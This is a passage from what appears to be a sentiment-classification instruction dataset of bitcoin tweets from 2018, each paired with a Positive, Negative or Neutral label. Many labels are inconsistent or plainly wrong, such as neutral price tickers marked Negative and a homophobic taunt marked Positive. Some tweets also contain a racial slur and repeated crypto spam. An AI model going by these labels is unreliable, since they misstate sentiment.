"Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I should have sold that bitcoin yday \ud83d\ude29", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9478.60 --- Includes Sum of Forks, Core $8449.00 (89.14%) + Cash $972.50 (10.26%) + Gold $57.10 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@josephkunzler Are you talking about bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8460.38.\nThe current price of BCash is $974.346, or 0.11559 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2018I Don\u2019t Think Bitcoin Will Last Forever\u2019: NSA Whistleblower Edward Snowden #BitcoinNews #btc #ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@roysebag @mene Yes I'll probably do it... But I would had like to see rings and pendants with Bitcoin symbol!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Sicarious_ An altcoin can not share the genesis block and be SHA256. If it does then it\u2019s an attempted bitcoin fork not an alt coin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mamawhale you can always pay in PBR. fuck Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The leading cause of heart attacks in 2018.. #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "14R382XrivAGwDgZkoFDMPq7dw7yFuAcBh\n\n@georgesoros send me bitcoin and i will vote for dnc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8474.51 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$974,346\n1 Hour: 0.40 % | 24 Hours: -7.47 % | 7 Days: 5.42 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#moneto This is a great project a specialized platform to provide loans in a fiatmoney on the security of Bitcoin. #crypto #blockchain #eth", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is ugly.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "FINANCIAL INDICATORS:\n\n$ trading at R11.8465\n\n\u00a3 trading at R16.7185\n\n\u20ac trading at R14.6108\n\nA Bitcoin costs R103420.00\n\nBrent Crude $68.91", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8493.01 / 6893.351\u20ac\n1 bitcoin-cash = $974.983 / 791.344\u20ac\n1 ethereum = $522.317 / 423.938\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@dahirdidit Pretty sure the arc already takes bitcoin :/", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LukeDashjr @CobraBitcoin BTG is basically exactly what you\u2019re proposing. A fork from bitcoin to change the mining algorithm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@neontaster No, it\u2019s like gold. Nations had borders back when gold was the world reserve currency. They can do the same with Bitcoin now.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #ICO #Bounty #airdrop #gambling #mining #crypto #trading #ethereum #dogecoin #litecoin #altcoin Just #FollowMe and i will #FollowBa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@217zombie101 @CryptoCoinNewz Bitcoin 2.0", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "my future wife jus gave a dude a dry hand job at the thought of bitcoin plummeting meanwhile I'm out this bitch...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MagUra_Crypto @officialmcafee @wolfofwallst A scammer saying no future for bitcoin? Sounds legit.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Okay bitcoin broker. You a tough guy.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MKBHD I can creat for you just any website category you want for $100. I'll accept #bitcoin #ethereum and #PayPal.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Time to discuss Bitcoin Hardware", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sha256 was rated as the most secure crypto algorithms. #Bitcoin uses that. It\u2019s proven to be impenetrable and most secure crypto #cryptocon", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nguyen_richy @BITCOlNCASH the 51\u2105 attack is only for double spending. Learn some bitcoin basics. Rules are imposed by the nodes.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin better fucking go up rn lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic selloff below 795", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic selloff below 795", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What the heck is a bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSethSL You gay if you use bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@derose @DavidFBailey @WayneVaughan @VinnyLingham @gyft Not only that, its very complex building apps on bitcoin...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@koinexindia $NANO will shake the world upside down. It is the next BIGGEST thing after Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Id go back and invest in apple and amazon and bitcoin. Delta too.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8498.22\nEthereum:$522.921\nBitcoin Cash:$977.619\nLitecoin:$159.751\nRipple:$0.642295\nIOTA:$1.28287", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8429.98@bitstamp. High $9046.180. Low $8342.000. Market Cap $142.755 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8498.22 / 6897.58\u20ac\n1 bitcoin-cash = $976.701 / 792.739\u20ac\n1 ethereum = $522.51 / 424.095\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8498.22 / 6897.58\u20ac\n1 bitcoin-cash = $976.701 / 792.739\u20ac\n1 ethereum = $522.51 / 424.095\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CalvinAyre Meal was paid for using bitcoin cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00079152 (+0.00000808) #BTC / 6.68708 (+0.11217) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003324 (+0.00000008) #BTC / 0.280737 (+0.00243) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002279 (+0.00000029) #BTC / 0.192533 (+0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0481625 (-0.00009450) #BTC / 406.897 (+1.90500) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004623 (+0.00000029) #BTC / 0.390468 (+0.00491) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_adampagano_ U gay if you don\u2019t buy drugs online with bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8498.22 as of Thu Mar 22 23:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8452.6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:31:49 2018 (37:20)\nUSD : 8437.36\nWght: 0.42\nBlk#: 514762\nSize: 1103.1 KB\nTXs: 2741\nPool: 1234 (0.6 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain maybe new bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CalvinAyre That\u2019s why I own bitcoin cash. These little kids disliking it validates it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@andreuswolf Anything regarding bitcoin is like opening Pandora's Box.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CeliaPacquola just seen your article in @theage lets talk #bitcoin !!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is consensual.\n\nFiat is force.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "First #FF @EichenYogeswari @DailyMail @MileySmilerNews @Bitcoin @NiGHTS_official @SarahRyanHudson @BrandiKHOU @lorde @HannaZellers", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Stop the bcash propaganda!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JacaNews Why not have a whole different Crypto segment instead of including just Bitcoin as single cryptocurrency ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The end game is a life in the photo of the city in my twitter header. #cryptolife #Cryptocurrency #FinancialFreedom #Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alminibach Are u saying that investing all ur life savings in bitcoin is a bad idea?!?!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Get FUDcked #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSethSL Do a lot of drug dealers accept bitcoin these days", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin \"once you get in, you cant get enough. It's like digital crack\" #bitcointrading #bitcoinschool #whatisbitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. test 2 : @slidecoin , spam or legit", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My twitter header is the end game #lifegoals #cryptolife #Cryptocurrency #Bitcoin #FinancialFreedom", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Poll #Crypto #bitcoin #ltc #litecoin \n\nHow often do you check how your coins are doing?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8475.55 / 6879.18\u20ac\n1 bitcoin-cash = $975.635 / 791.874\u20ac\n1 ethereum = $521.277 / 423.094\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain Blockchain is the tech. Bitcoin is merely the first mainstream manifestation of its potential.\u201d - Marc Kenigsberg", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain Bitcoin is unstoppable.\u201d - Roger Ver aka \u201cBitcoin Jesus\u201d Voluntaryist", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.37%, ($-5720.01) [Currently $8449.995] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin is like the better technology in a backup role waiting for the primary to fail\ud83d\udd25", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:42:31 2018 (10:42)\nUSD : 8429.77\nWght: 0.42\nBlk#: 514763\nSize: 1050.2 KB\nTXs: 2243\nPool: 14 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Currently Bitcoin, Ethereum, and Litecoin in my opinion", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000003b8101bed05b189c7d6522a0da5e0add0eb5c562e27838 mined at height 514763.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@derekmagill @ryanxcharles @YoursOrg @Satoshis_Vision Bitcoin Cash #1", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I wonder if the #POTUS has #bitcoin, looks like #tariffs could make #Crypto ... great again\ud83d\udd25", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Ads suck. Let's use Bitcoin Cash instead.\" - @ryanxcharles @YoursOrg at @Satoshis_Vision", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Yorkyor30444439 Bitcoin with the fork-athon of 2017 during the last trimester was a perfect example of this.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto why always assume parallel with bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@martin_kj @TeaPainUSA @materia1wor1d @GeeJustG Yeah - Bitcoin, drugs - maybe they finally nailed \"Satoshi Nakamoto\".", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "morning \nbitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8425 / \u20ac6830 / \u00a35967 @ Block 514762. \nMarket Cap: 143.22B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alexfarncomb @tabcomau Money? I thought you'd be using your Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SilviuMajor @Lowmehlee What\u2019s that in bitcoin 2gen", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".@elonmusk I was there since the early days (6M followers). where is my Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Why Bitcoin Cash? It works today and it has the best chance to keep working tomorrow.\" - @ryanxcharles @YoursOrg @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8474.65 / 6878.449\u20ac\n1 bitcoin-cash = $975.691 / 791.919\u20ac\n1 ethereum = $521.114 / 422.962\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Hunting_Rabbits If there was consensus, would the Bitcoin community have split into different factions?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin needs some whale action, or we we\u2019ll be seeing some new lows shortly!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8406.73", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Do you guys realise that we are part of a revolution called cryptocurency? #JACKMAtE #Bitcoin #CryptoCurrency #Altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Most underappreciated characterisric of Bitcoin:\n\n1) Anonymous Founder\n2) Limited Supply", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Jay and Dan highlights from episode 126 on SC:\n\nPhotos of an announcer\nHey Jack\nBark in the park night\nBitcoin investing\n\n#JayandDan", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Every friday is bitcoin day", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Crym89s @veIvetines Yeap and buying bitcoin at .006 cents", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +766.32%, (+$7453.27) [Currently $8425.875] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:56:25 2018 (13:54)\nUSD : 8420.81\nWght: 0.42\nBlk#: 514764\nSize: 839.2 KB\nTXs: 1398\nPool: 97 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004cdb6d6e08435c5fbb306130c6af2b50ce9815ae2e6f1d mined at height 514764.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kevincosandey Do you accept bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"The way to make Bitcoin Cash mainstream is to make it easy for anyone to earn Bitcoin Cash.\" @ryanxcharles @YoursOrg @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dutch Court Finds Bitcoin A Legitimate \u201cTransferable Value\u201d...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30397.35997000 | BITCOIN(BLCHAIN) R$27928.02 | LITECOIN(MCDTBC) R$575.99995000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 BTC is \n INR 548,843 or\n USD 8,421 or\n GBP 5,964 or\n EUR 6,827\n\n #Bitcoin #BitcoinPrice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8419.37 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 10:00PM #Bitcoin Price:\nUSD 8657.47 | EUR 7029.56 | JPY 921267.14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,460.33, market cap of $143,271,559,909 (44.33%), and 24 hr vol. of $5,515,150,000 (37.68%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,460.33\nChange in 1h: +0.14%\nMarket cap: $143,271,559,909.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8460.33\nEthereum:$520.325\nBitcoin Cash:$973.61\nLitecoin:$159.12\nRipple:$0.637725\nIOTA:$1.27707", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.29% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,419.37, EUR 6,824.96", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.41 / 6859.586\u20ac\n1 bitcoin-cash = $972.688 / 789.482\u20ac\n1 ethereum = $518.784 / 421.071\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Women don't want a nigga buying them flowers anymore. They want shit like bitcoin or just give them money.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.41 / 6859.586\u20ac\n1 bitcoin-cash = $972.688 / 789.482\u20ac\n1 ethereum = $518.784 / 421.071\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin 24Hour High/Low:\nHigh: $9,402.26\nLow: $8,878.77", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can't kill Bitcoin\n\n-@APompliano", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8411.04/$8418.50 #Bitstamp\n$8402.15/$8412.18 #Kraken\n\u21e2$-16.35/$1.14\n$8369.99/$8455.38 #Coinbase\n\u21e2$-48.51/$44.34", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$29.4M; Support til $8200:$38.7M $BTC $BTCUSD #bitcoin #orderbook #crypto #finance", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.05 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078324 (-0.00000828) #BTC / 6.59819 (-0.08889) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004597 (-0.00000026) #BTC / 0.386025 (-0.00444) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0476288 (-0.00053370) #BTC / 399.923 (-6.97400) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8430.99 | +0.0015%\ud83d\udcc8\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002272 (-0.00000007) #BTC / 0.190783 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003306 (-0.00000018) #BTC / 0.277553 (-0.00318) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sshhh dont tell anyone but #Bitcoin is $8412.05 right now. Ok back to sleep zzzzz", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DavidDagan @CherylPreheim @deray @11AliveNews No! The incredibly specific amount of $51k in bitcoin please and thank you.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,417.21 v #BitcoinCash $971.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 14:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83d\udce3 Bitcoin is $8412.06 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "8412.06$ for #bitcoin now", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Next Bitcoin is The Champcoin (TCC)\nIndia's First & No1 CryptoCurrency...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8412.06 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8412.06", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mindstatex @SheriUcar #Bitcoin(BCH) is the KING of the Crypto Currencies.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8412.06 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@allcharmngrace @clairlemon @MarkYusko @iammarkcarnegie How do you short bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AlanMCole Bitcoin is still in the early adopter phase", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Ditcoin is very good currency I love ditcoin my future Bitcoin my dream ditcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin This is a bcash promote account. Attention.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bethereumteam Betherum coin is very good coin and next bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Bitcoin, the money of the New World Order!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's your boy, Ms. slayer that loves talking about Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Can someone tell me exactly why Bitcoin Gold is valued @ $60, does anyone use this for anything?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8460.33 Up +$16.22 +0.19% in the last hour #bitcoin #bitsmart", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pierre_rochard centralized currencies, digital or not are printed by the government, Bitcoin isn't.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MashaT22 @coinbase 